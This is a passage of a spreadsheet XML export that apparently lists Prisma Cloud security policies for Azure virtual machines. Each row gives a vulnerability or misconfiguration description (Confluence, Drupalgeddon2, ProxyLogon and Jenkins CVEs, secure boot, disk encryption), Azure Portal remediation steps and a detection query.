Exploitation of these vulnerabilities poses significant threats to the system's confidentiality, integrity, and availability. They allow attackers to gain complete control and potentially shut down the affected resources. Exploiting these CVEs can enable attackers to deploy Cerber Ransomware and gain complete control over the system.
The Azure Virtual Machine being publicly exposed makes it an easy target for attackers to exploit vulnerabilities. If successfully exploited, attackers could deploy Cerber Ransomware, leading to data encryption, exfiltration, and other malicious activities that undermine the confidentiality and integrity of the system.
Immediate attention is required to remediate the Confluence (CVE-2023-22515 and CVE-2023-22518) vulnerabilities and the public exposure reported for the affected Azure Virtual Machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2613" t="inlineStr">
        <is>
          <t>[Internet Exposure]
Restrict internet exposure of reported virtual machines based on business requirements by modifying network security group rules to trusted IP addresses.
To modify Network security group rules, perform the following steps:
1. Log in to the Azure Portal
2. Select 'All services'
3. Select 'Virtual Machines' under Compute
4. Identify the Virtual machine that you want to restrict Internet access
4. Under 'Settings' click on 'Networking'
5. In the 'Inbound port rules' section, select the rule that allows Internet access (0.0.0.0/0) to the trusted IP address
For more details, see -
https://learn.microsoft.com/en-us/azure/virtual-network/manage-network-security-group?tabs=network-security-group-portal#change-a-security-rule
NOTE: When modifying Network security group rules, ensure you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.
[Vulnerability]
To patch or update the vulnerable software, see:
https://nvd.nist.gov/vuln/detail/CVE-2023-22515
https://nvd.nist.gov/vuln/detail/CVE-2023-22518</t>
        </is>
      </c>
      <c r="Y2613" t="inlineStr"/>
      <c r="Z2613" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0) on ports 80/443') AND with : (Vuln WHERE id IN ('CVE-2023-22515','CVE-2023-22518'))</t>
        </is>
      </c>
      <c r="AA2613" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2613" t="inlineStr">
        <is>
          <t>2024-06-10 07:02:52</t>
        </is>
      </c>
      <c r="AC2613" t="inlineStr"/>
      <c r="AD2613" t="b">
        <v>1</v>
      </c>
      <c r="AE2613" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2613" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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3" t="inlineStr">
        <is>
          <t>eca27e5d-4d6c-4ba6-8f80-4cb15151131d</t>
        </is>
      </c>
      <c r="AI2613" t="inlineStr">
        <is>
          <t>1172697e-980c-44cb-bbc9-9391516a5df9</t>
        </is>
      </c>
      <c r="AJ2613" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2613" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2614">
      <c r="A2614" t="inlineStr">
        <is>
          <t>CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2614" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2614" s="2" t="inlineStr"/>
      <c r="D2614" t="inlineStr"/>
      <c r="E2614" t="inlineStr"/>
      <c r="F2614" t="inlineStr"/>
      <c r="G2614" t="b">
        <v>1</v>
      </c>
      <c r="H26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14" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2614" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2614" t="inlineStr">
        <is>
          <t>Azure Virtual Desktop disk encryption not configured with Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L2614" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2614" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2614" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2614" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2614" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2614" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2614" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2614" t="inlineStr"/>
      <c r="T2614" t="b">
        <v>0</v>
      </c>
      <c r="U2614" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2614" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2614" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Desktop environments where disk encryption is not configured using a Customer Managed Key (CMK). 
Disk encryption is crucial for protecting data in Azure Virtual Desktop environments. By default, disks may be encrypted with Microsoft-managed keys, which might not meet specific security requirements. Using Customer Managed Keys (CMKs) offers better control over encryption, allowing organizations to manage key rotation, access, and revocation, thereby enhancing data security and compliance.
As a best practice, it is recommended to configure disk encryption for Azure Virtual Desktop with a Customer Managed Key (CMK).</t>
        </is>
      </c>
      <c r="X2614" t="inlineStr">
        <is>
          <t>Note: To enable disk encryption on any disks attached to a VM, you must first stop the VM.
1. Log in to Azure Portal and search for 'Disks'.
2. Select 'Disks'.
4. Select the reported disk.
5. Under 'Settings' select 'Encryption'.
6. For 'Key management', select 'Customer-managed key' from drop-down list.
6. For the disk encryption set, select an existing one. If none are available, create a new disk encryption set.
7. Click on 'Save'.</t>
        </is>
      </c>
      <c r="Y2614" t="inlineStr"/>
      <c r="Z2614" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-vm-list' AND json.rule = ['Extensions'].['Microsoft.PowerShell.DSC'].['settings'].['properties'].['hostPoolName'] exists and powerState contains running as X; config from cloud.resource where api.name = 'azure-disk-list' AND json.rule = provisioningState equal ignore case Succeeded and (encryption.type does not contain "EncryptionAtRestWithCustomerKey" or encryption.diskEncryptionSetId does not exist) as Y; filter ' $.X.id equal ignore case $.Y.managedBy '; show Y;</t>
        </is>
      </c>
      <c r="AA2614" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2614" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2614" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-1277</t>
        </is>
      </c>
      <c r="AD2614" t="b">
        <v>1</v>
      </c>
      <c r="AE2614" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2614" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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14" t="inlineStr">
        <is>
          <t>aae4701f-e646-4299-828a-0294a8de9586</t>
        </is>
      </c>
      <c r="AI2614" t="inlineStr">
        <is>
          <t>78a6f755-a7f2-48df-8924-920fb3c651f1</t>
        </is>
      </c>
      <c r="AJ2614" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2614" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2615">
      <c r="A2615" t="inlineStr"/>
      <c r="B2615" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2615" s="2" t="inlineStr"/>
      <c r="D2615" t="inlineStr"/>
      <c r="E2615" t="inlineStr"/>
      <c r="F2615" t="inlineStr"/>
      <c r="G2615" t="b">
        <v>1</v>
      </c>
      <c r="H26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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2615" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2615" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable Azure Virtual Machine (Apache Submarine, CVE-2023-46302)</t>
        </is>
      </c>
      <c r="L2615" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2615" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2615" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2615" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2615" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2615" t="inlineStr"/>
      <c r="R2615" t="inlineStr"/>
      <c r="S2615" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2615" t="b">
        <v>0</v>
      </c>
      <c r="U2615" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2615" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2615" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2023-46302).
Remote code execution vulnerability would allow an attacker to execute arbitrary code on the host operating system, potentially leading to system compromise, data breaches and escalate privileges to launch further attacks. The fact that the Azure Virtual Machine is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Successful exploitation of the Apache Submarine Remote code execution vulnerability on the publicly exposed Azure Virtual Machine would allow an attacker to gain full control of the host and further move laterally to compromise other resources. This could lead to monetary loss, damage to reputation, and other compliance risks to the organization.
Immediate attention is required to remediate the Apache Submarine (CVE-2023-46302) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2615"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CVE-2023-46302
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-46302</t>
        </is>
      </c>
      <c r="Y2615" t="inlineStr"/>
      <c r="Z2615" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-46302'))</t>
        </is>
      </c>
      <c r="AA2615" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2615" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:14</t>
        </is>
      </c>
      <c r="AC2615" t="inlineStr"/>
      <c r="AD2615" t="b">
        <v>1</v>
      </c>
      <c r="AE2615" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2615" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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5" t="inlineStr">
        <is>
          <t>7f45d0df-12a9-40de-bc68-ec91dc5a4989</t>
        </is>
      </c>
      <c r="AI2615" t="inlineStr">
        <is>
          <t>a3c564fc-c02a-49ce-9337-9ca2dd0c29ed</t>
        </is>
      </c>
      <c r="AJ2615" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2615" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2616">
      <c r="A2616" t="inlineStr"/>
      <c r="B2616" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2616" s="2" t="inlineStr"/>
      <c r="D2616" t="inlineStr"/>
      <c r="E2616" t="inlineStr"/>
      <c r="F2616" t="inlineStr"/>
      <c r="G2616" t="b">
        <v>1</v>
      </c>
      <c r="H26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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2616" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2616" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [Drupalgeddon2, CVE-2018-7600]</t>
        </is>
      </c>
      <c r="L2616" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2616" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2616" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2616" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2616" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2616" t="inlineStr"/>
      <c r="R2616" t="inlineStr"/>
      <c r="S2616" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2616" t="b">
        <v>0</v>
      </c>
      <c r="U2616" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2616" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2616" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to Remote Code Execution (RCE) with exploits in the wild [Drupalgeddon2, CVE-2018-7600].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of Drupal installed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the Drupalgeddon2 [CVE-2018-7600] vulnerability reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X2616"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CVE-2018-7600
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2018-7600</t>
        </is>
      </c>
      <c r="Y2616" t="inlineStr"/>
      <c r="Z2616" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2018-7600 - Drupalgeddon2) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2018-7600'))</t>
        </is>
      </c>
      <c r="AA2616" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2616" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:44</t>
        </is>
      </c>
      <c r="AC2616" t="inlineStr"/>
      <c r="AD2616" t="b">
        <v>1</v>
      </c>
      <c r="AE2616" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2616" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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6" t="inlineStr">
        <is>
          <t>8ee8fd7b-cf6f-45fc-80ac-7d12b0487f8b</t>
        </is>
      </c>
      <c r="AI2616" t="inlineStr">
        <is>
          <t>d3f8914d-6c93-48ed-9310-8359e87e8d6f</t>
        </is>
      </c>
      <c r="AJ2616" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2616" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2617">
      <c r="A2617" t="inlineStr"/>
      <c r="B2617" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2617" s="2" t="inlineStr"/>
      <c r="D2617" t="inlineStr"/>
      <c r="E2617" t="inlineStr"/>
      <c r="F2617" t="inlineStr"/>
      <c r="G2617" t="b">
        <v>1</v>
      </c>
      <c r="H26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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2617" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2617" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [ProxyLogon/HAFNIUM Attack Chain, CVE-2021-26855]</t>
        </is>
      </c>
      <c r="L2617" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2617" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2617" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2617" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2617" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2617" t="inlineStr"/>
      <c r="R2617" t="inlineStr"/>
      <c r="S2617" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2617" t="b">
        <v>0</v>
      </c>
      <c r="U2617" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2617" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2617" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to Remote Code Execution (RCE) with exploits in the wild [ProxyLogon/HAFNIUM Attack Chain, CVE-2021-26855].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version exposed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the ProxyLogon/HAFNIUM Attack Chain vulnerability [CVE-2021-26855] reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X261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CVE-2021-26855
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2021-26855</t>
        </is>
      </c>
      <c r="Y2617" t="inlineStr"/>
      <c r="Z2617" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-26855 - ProxyLogon/HAFNIUM RCE Attack Chain) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-26855'))</t>
        </is>
      </c>
      <c r="AA2617" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2617" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:45</t>
        </is>
      </c>
      <c r="AC2617" t="inlineStr"/>
      <c r="AD2617" t="b">
        <v>1</v>
      </c>
      <c r="AE2617" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2617" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG26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7" t="inlineStr">
        <is>
          <t>ecb5a2ce-dac0-4eff-9cd4-ba15b0934ff1</t>
        </is>
      </c>
      <c r="AI2617" t="inlineStr">
        <is>
          <t>0373c2e7-cf97-4d13-bf0f-f8973eae4fbe</t>
        </is>
      </c>
      <c r="AJ2617" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2617" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2618">
      <c r="A2618" t="inlineStr"/>
      <c r="B2618" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2618" s="2" t="inlineStr"/>
      <c r="D2618" t="inlineStr"/>
      <c r="E2618" t="inlineStr"/>
      <c r="F2618" t="inlineStr"/>
      <c r="G2618" t="b">
        <v>1</v>
      </c>
      <c r="H26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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2618" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2618" t="inlineStr">
        <is>
          <t>Stored Cross Site scripting risk due to publicly exposed and vulnerable Azure Virtual Machine [Jenkins, CVE-2023-27898]</t>
        </is>
      </c>
      <c r="L2618" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2618" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2618" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2618" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2618" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2618" t="inlineStr"/>
      <c r="R2618" t="inlineStr"/>
      <c r="S2618" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2618" t="b">
        <v>0</v>
      </c>
      <c r="U2618" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2618" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2618" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have known exploitable stored cross-site scripting vulnerability [CVE-2023-27898].
Stored cross-site scripting vulnerability poses a significant threat by allowing attackers to inject malicious scripts into web applications, which can potentially lead to unauthorized data access, session hijacking, and other security breaches. The fact that the Azure Virtual Machine is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the Jenkins [CVE-2023-27898] vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2618" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict access to Azure Virtual machine by modfying Inbound port rules
1. Sign in to the Azure Portal using your Azure account credentials
2. Navigate to the Virtual machine dashboard
3. Identify the reported virtual machine that you want to restrict public access
4. Navigate to the 'Networking' section
5. Under 'Inbound port rules', click on inbound rules that have 'Source' having 'Any' or 'Internet' or IP addresses containing (0.0.0.0/0)
6. Set the 'Source' to the 'IP addresses' and enter trusted IP address or CIDR range in 'Source IP addresses/CIDR ranges'
7. Click 'Save' to apply the changes
[VULNERABILITY]
1. Identify and access the reported resource affected by CVE-2023-27898
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-27898</t>
        </is>
      </c>
      <c r="Y2618" t="inlineStr"/>
      <c r="Z2618" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-27898'))</t>
        </is>
      </c>
      <c r="AA2618" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2618" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2618" t="inlineStr"/>
      <c r="AD2618" t="b">
        <v>1</v>
      </c>
      <c r="AE2618" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2618" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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8" t="inlineStr">
        <is>
          <t>427067a3-f766-4338-a59e-342ffc4324af</t>
        </is>
      </c>
      <c r="AI2618" t="inlineStr">
        <is>
          <t>0a85e869-e02a-47fd-b542-9c8ee10b97a2</t>
        </is>
      </c>
      <c r="AJ2618" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2618" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2619">
      <c r="A2619" t="inlineStr">
        <is>
          <t>MLPS 2.0 (Level 2), CIS v2.1.0 (Azure) Level 1, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX)</t>
        </is>
      </c>
      <c r="B2619" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2619" s="2" t="inlineStr"/>
      <c r="D2619" t="inlineStr"/>
      <c r="E2619" t="inlineStr"/>
      <c r="F2619" t="inlineStr"/>
      <c r="G2619" t="b">
        <v>1</v>
      </c>
      <c r="H26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19" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2619" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2619" t="inlineStr">
        <is>
          <t>Azure Virtual Machine (Windows) secure boot feature is disabled</t>
        </is>
      </c>
      <c r="L2619" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2619" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2619" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2619" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2619" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2619" t="inlineStr">
        <is>
          <t>SOX Section 302</t>
        </is>
      </c>
      <c r="R2619" t="inlineStr">
        <is>
          <t>Section 302.4</t>
        </is>
      </c>
      <c r="S2619" t="inlineStr"/>
      <c r="T2619" t="b">
        <v>0</v>
      </c>
      <c r="U2619" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2619" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2619" t="inlineStr">
        <is>
          <t>This policy identifies Virtual Machines (Windows) that have secure boot feature disabled. Enabling Secure Boot on supported Windows virtual machines provides mitigation against malicious and unauthorised changes to the boot chain. Secure boot helps protect your VMs against boot kits, rootkits, and kernel-level malware. So it is recommended to enable Secure boot for Azure Windows virtual machines. 
NOTE: This assessment only applies to trusted launch enabled Windows virtual machines. You can't enable trusted launch on existing virtual machines that were initially created without it. 
To know more, refer https://docs.microsoft.com/azure/virtual-machines/trusted-launch?WT.mc_id=Portal-Microsoft_Azure_Security</t>
        </is>
      </c>
      <c r="X2619" t="inlineStr">
        <is>
          <t>1. Log in to Azure portal
2. Navigate to Virtual machines dashboard
3. Click on the reported Virtual machine
4. Select 'Configuration' under 'Settings' from left panel 
NOTE: Enabling Secure Boot will trigger an immediate SYSTEM REBOOT.
5. On the 'Configuration' page, check 'Secure boot' under 'Security type' section
6. Click 'Save'</t>
        </is>
      </c>
      <c r="Y2619" t="inlineStr"/>
      <c r="Z2619" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-vm-list' AND json.rule = powerState equal ignore case "PowerState/running" and ['properties.storageProfile'].['osDisk'].['osType'] contains "Windows" and ['properties.securityProfile'].['securityType'] equal ignore case "TrustedLaunch" and ['properties.securityProfile'].['uefiSettings'].['secureBootEnabled'] is false</t>
        </is>
      </c>
      <c r="AA2619" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2619" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2619" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-916</t>
        </is>
      </c>
      <c r="AD2619" t="b">
        <v>1</v>
      </c>
      <c r="AE2619" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2619" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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19" t="inlineStr">
        <is>
          <t>f501f01a-59a9-476e-a6de-d8bbe69a1616</t>
        </is>
      </c>
      <c r="AI2619" t="inlineStr">
        <is>
          <t>72ea233a-3c9c-4ff8-a788-302598c0f0cc</t>
        </is>
      </c>
      <c r="AJ2619" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2619" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2620">
      <c r="A2620" t="inlineStr"/>
      <c r="B2620" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2620" s="2" t="inlineStr"/>
      <c r="D2620" t="inlineStr"/>
      <c r="E2620" t="inlineStr"/>
      <c r="F2620" t="inlineStr"/>
      <c r="G2620" t="b">
        <v>1</v>
      </c>
      <c r="H26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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2620" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2620" t="inlineStr">
        <is>
          <t>Potential malicious activity on Azure Virtual Machine affected by malware</t>
        </is>
      </c>
      <c r="L2620" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,MALWARE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2620" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2620" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2620" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2620" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2620" t="inlineStr"/>
      <c r="R2620" t="inlineStr"/>
      <c r="S2620" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2620" t="b">
        <v>0</v>
      </c>
      <c r="U2620" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2620" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2620" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are affected by malware and are connected with remote systems known for malware activities.
Malware activity includes activity from viruses, trojans, worms, ransomware, botnet, spambot and other types of malware. If network connectivity with remote systems known for malware activity is observed on an Azure Virtual Machine, it could indicate that the virtual machine is already has been compromised and the malware is currently in operation.
Immediate attention is required to remediate the malware reported for the Azure Virtual Machine as soon as possible and investigate suspicious network activities.</t>
        </is>
      </c>
      <c r="X2620"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620" t="inlineStr"/>
      <c r="Z2620" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name = (('Host contains Malware' or 'Host contains Grayware')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t>
        </is>
      </c>
      <c r="AA2620" t="inlineStr">
